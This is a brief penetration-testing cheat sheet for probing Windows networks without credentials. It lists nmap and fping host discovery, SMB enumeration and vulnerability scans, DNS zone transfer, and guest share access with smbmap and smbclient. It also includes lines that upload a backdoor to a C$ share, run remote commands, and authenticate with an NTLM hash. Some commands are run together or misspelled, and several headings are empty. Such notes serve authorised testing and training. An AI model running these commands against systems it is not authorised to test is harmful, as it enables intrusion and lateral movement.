Without Credentials
Without Credentials
Host Discovery
nmap -sn 192.168.2.0/24fping -a -g 192.168.2.0/24 2>/dev/nullScan the network
# Enumerate smb hosts
cme smb IP/CIDR
# Search smb vulns
nmap -PN --script smb-vuln* -p 139,445 IPZone transfer
dig axfr domain@nameserverList guest access on smb share
smbmap -u "" -p "" -H <dc-ip>
smbmap -u "guest" -p "" -H <dc-ip>smbmap -H -u -p -Lsmbmap -H -u -p -r 'C$'smbmap -H -u -p --upload '/root/backdoor' 'C$\backdoor'smbmap -H -u -p --download 'C$\flag.txtsmbmap -H -u -p -x 'ipconfig',ma smbclient -L <ip> -N
smbclient //<ip>/public -Nsmbclient -L <ip> -U <user>
smbclient //<ip>/public -U <user>
mbclient //192.168.50.212/secrets -U <user> --pw-nt-hash <hash>Enumerate ldap
Find User List
Grab NTLMv2 hash
File Upload

Relaying NTLMv2
SMB Relaying
Last updated